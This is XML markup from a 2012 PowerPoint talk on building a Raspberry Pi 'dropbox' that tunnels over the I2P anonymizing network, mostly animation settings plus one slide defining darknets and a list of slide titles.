                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="128" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11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additive="base">
                                        <p:cTn id="131" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="132" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>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19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="135" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="119"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="136" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="119"/>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22"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="139" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="122"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="140" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="122"/>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additive="base">
                                        <p:cTn id="143" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="144" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125"/>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28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="147" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="128"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="148" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="128"/>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140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="151" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="152" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="140"/>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44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="155" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="156" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144"/>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145"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="159" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="145"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="160" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14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46"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="163" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="146"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="164" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="146"/>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147"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="167" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="147"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="168" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="147"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_h/2"/>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131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="171" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="172" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>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89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="175" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="176" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>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89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="179" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="18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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Darknets: There are many definitions, but the one I’m working from is “anonymizing networks”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use of encryption and proxies (some times other peers) to obfuscate who is communicating to whom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sometimes referred </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cipherspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(I love that term)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I2P will be my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cipherspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of choice, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Telecomix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has details on Tor.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240256807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34.7|24.1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|12.5|6.2|5.9"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="TIMING" val="|3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5695</TotalTime>
  <Words>1491</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>291</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Apex</vt:lpstr>
      <vt:lpstr>Dingleberry Pi: Raspberry Pi Dropbox</vt:lpstr>
      <vt:lpstr>About Adrian</vt:lpstr>
      <vt:lpstr>What is this talk about?</vt:lpstr>
      <vt:lpstr>How did I get into this?</vt:lpstr>
      <vt:lpstr>Other Options?</vt:lpstr>
      <vt:lpstr>Why I chose the Raspberry Pi</vt:lpstr>
      <vt:lpstr>Straight Connect</vt:lpstr>
      <vt:lpstr>Tunneled through Cipher-space</vt:lpstr>
      <vt:lpstr>A little background…</vt:lpstr>
      <vt:lpstr>I2P Encryption Layers</vt:lpstr>
      <vt:lpstr>Getting Linux on The Raspberry Pi</vt:lpstr>
      <vt:lpstr>Images are easy</vt:lpstr>
      <vt:lpstr>GParted</vt:lpstr>
      <vt:lpstr>Notable Mention: PwnPi</vt:lpstr>
      <vt:lpstr>Setting up I2P</vt:lpstr>
      <vt:lpstr>Get update, add some useful tools</vt:lpstr>
      <vt:lpstr>Wget the I2P Install</vt:lpstr>
      <vt:lpstr>Fix Jbigi Library</vt:lpstr>
      <vt:lpstr>Edit the I2P Run Script</vt:lpstr>
      <vt:lpstr>Start and Stop I2P</vt:lpstr>
      <vt:lpstr>Edit some settings</vt:lpstr>
      <vt:lpstr>Set a Console Password</vt:lpstr>
      <vt:lpstr>Give Access to the Proxies</vt:lpstr>
      <vt:lpstr>Running and keeping it up</vt:lpstr>
      <vt:lpstr>Tweaks</vt:lpstr>
      <vt:lpstr>Setting up the Darknet: Server side</vt:lpstr>
      <vt:lpstr>Setting up the Darknet: Client side</vt:lpstr>
      <vt:lpstr>SSH Phone Home</vt:lpstr>
      <vt:lpstr>Using the Raspberry Pi as a proxy/pivot </vt:lpstr>
      <vt:lpstr>Proxy/Pivot The NCAT Way</vt:lpstr>
      <vt:lpstr>Proxy/Pivot  OpenSSH way</vt:lpstr>
      <vt:lpstr>SSH Keys Setup</vt:lpstr>
      <vt:lpstr>Reverse SSH Automatic Script</vt:lpstr>
      <vt:lpstr>Autossh script</vt:lpstr>
      <vt:lpstr>Reverse SSH Automatic Script</vt:lpstr>
      <vt:lpstr>SSH Automatic Script</vt:lpstr>
      <vt:lpstr>Etherlogger</vt:lpstr>
      <vt:lpstr>Just Add USB Ethernet Adapter</vt:lpstr>
      <vt:lpstr>Get Some Packages and Test</vt:lpstr>
      <vt:lpstr>Simple Logging Script</vt:lpstr>
      <vt:lpstr>Run it on Start Up</vt:lpstr>
      <vt:lpstr>Raspberry Pi Dock/Laptop</vt:lpstr>
      <vt:lpstr>“Fallopian” Cable</vt:lpstr>
      <vt:lpstr>A Little Hardware Hacking</vt:lpstr>
      <vt:lpstr>GPIO</vt:lpstr>
      <vt:lpstr>Blinky!</vt:lpstr>
      <vt:lpstr>Blinky, the Hello World of Electronics</vt:lpstr>
      <vt:lpstr>What about voltage?</vt:lpstr>
      <vt:lpstr>Simple “Is It High?”</vt:lpstr>
      <vt:lpstr>Output Source  Demo</vt:lpstr>
      <vt:lpstr>Serial Killer </vt:lpstr>
      <vt:lpstr>Serial Source and Demo</vt:lpstr>
      <vt:lpstr>More Ideas…</vt:lpstr>
      <vt:lpstr>For more info on mesh networks</vt:lpstr>
      <vt:lpstr>Mesh/Store and forward</vt:lpstr>
      <vt:lpstr>Raspberry Pi Links</vt:lpstr>
      <vt:lpstr>Links</vt:lpstr>
      <vt:lpstr>Links</vt:lpstr>
      <vt:lpstr>Thanks</vt:lpstr>
      <vt:lpstr>Events</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Raspberry Pi Dropbox</dc:title>
  <dc:creator>adrian</dc:creator>
  <cp:lastModifiedBy>Adrian Crenshaw</cp:lastModifiedBy>
  <cp:revision>1205</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-07-14T18:55:35Z</dcterms:modified>
</cp:coreProperties>
</file>